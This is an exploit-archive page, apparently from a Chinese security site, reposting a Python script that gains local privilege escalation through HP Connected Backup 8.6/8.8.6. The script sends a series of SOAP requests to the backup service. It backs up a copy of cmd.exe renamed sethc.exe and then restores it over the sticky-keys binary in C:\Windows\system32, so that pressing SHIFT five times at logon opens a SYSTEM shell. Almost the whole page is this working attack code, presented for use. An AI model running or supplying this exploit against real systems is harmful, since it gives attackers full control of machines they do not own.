首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation 来源：vfocus.net 作者：PeterLapp 发布时间：2018-01-24   #Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64   import os import sys import time import requests from bs4 import BeautifulSoup   def send_request(body):     url="http://localhost:16386/"     headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"}     response = requests.post(url, data=body, headers=headers)     if response.status_code != requests.codes.ok:         print "Non-200 response. Exiting..."         sys.exit()     else:         return response.text                   def get_tdate(response):     soup = BeautifulSoup(response, "html.parser")     tdate = soup.findAll("m-tdate")[0].string     return tdate      #Copy cmd.exe to world-writeable folder print "HP Connected Backup Privilege Escalation by Peter Lapp(lappsec)" print "Copying cmd.exe to C:\\hpcb-privesc" os.system("mkdir C:\\hpcb-privesc") os.system("copy C:\\Windows\\system32\\cmd.exe C:\\hpcb-privesc\\sethc.exe")          print "Creating backup for C:\\hpcb-privesc\\sethc.exe"   #StartScan required before IncludeFile request will be accepted send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:StartScan xmlns:q1="http://localhost/UIRequestHandler.wsdl" /></soap:Body></soap:Envelope>""")   time.sleep(3)   #Add file to backup send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:IncludeFile xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:base64Binary">QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==</param-1><param-2 xsi:type="xsd:boolean">true</param-2></q1:IncludeFile></soap:Body></soap:Envelope>""")     print "Initiating Backup" #Start backup   send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:Backup xmlns:q1="http://localhost/UIRequestHandler.wsdl" /></soap:Body></soap:Envelope>""")   print """Sleeping for 300 seconds to give time for backup to complete. If the script fails after this then change the sleep period to give the backup enough time to complete"""   time.sleep(300)   print "Initiating restore" #PrepareRetrieve requires valid PID of process running as SYSTEM. PID 456 is common for Windows 7 but if it fails, try another   send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:PrepareForRetrieve xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:unsignedInt">456</param-1></q1:PrepareForRetrieve></soap:Body></soap:Envelope>""")   #We have to get the m-TDate value for the file in order for the restore to work correctly print "Getting m-TDate value" fileinfo = send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:GetRestoreDirectoryInfo xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:base64Binary">QzpcaHBjYi1wcml2ZXNjXA==</param-1></q1:GetRestoreDirectoryInfo></soap:Body></soap:Envelope>""") tdate = get_tdate(fileinfo)   print "Adding Restore file"   send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:AddRestoreFile xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:base64Binary">QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==</param-1><param-2 xsi:type="xsd:boolean">false</param-2><param-3 xsi:type="xsd:unsignedInt">"""+tdate+"""</param-3></q1:AddRestoreFile></soap:Body></soap:Envelope>""")     print "Setting alternate restore path to C:\\Windows\\system32\\"   send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:SetAlternateRestorePath xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:string">C:\Windows\system32</param-1><param-2 xsi:type="xsd:boolean">false</param-2></q1:SetAlternateRestorePath></soap:Body></soap:Envelope>""")     #Set restore to replace existing file send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:SetReplaceExisting xmlns:q1="http://localhost/UIRequestHandler.wsdl"><param-1 xsi:type="xsd:boolean">true</param-1></q1:SetReplaceExisting></soap:Body></soap:Envelope>""")   print "Restoring C:\\hpcb-privesc\\sethc.exe to C:\\Windows\\system32\\sethc.exe" send_request("""<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://localhost//UIRequestHandler.wsdl" xmlns:types="http://localhost//UIRequestHandler.wsdl/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><q1:Restore xmlns:q1="http://localhost/UIRequestHandler.wsdl" /></soap:Body></soap:Envelope>""")   print "If it made it this far without an error, then you should now be able to log out, press SHIFT 5 times and be given a command prompt as SYSTEM. Enjoy!"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·RAVPower 2.000.056 - Memory Di ·Photography CMS 1.0 - Cross-Si ·MixPad 5.00 - Buffer Overflow ·Asus Unauthenticated LAN Remot ·NEC Univerge SV9100/SV8100 Web ·MikroTik RouterOS < 6.38.5 Rem ·Simple ASC CMS 1.2 Database Di ·GoAhead Web Server LD_PRELOAD ·PHPFreeChat 1.7 - Denial of Se ·Kaltura Remote PHP Code Execut ·macOS 10.13 (17A365) - Kernel ·Sync Breeze Enterprise 9.5.16   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved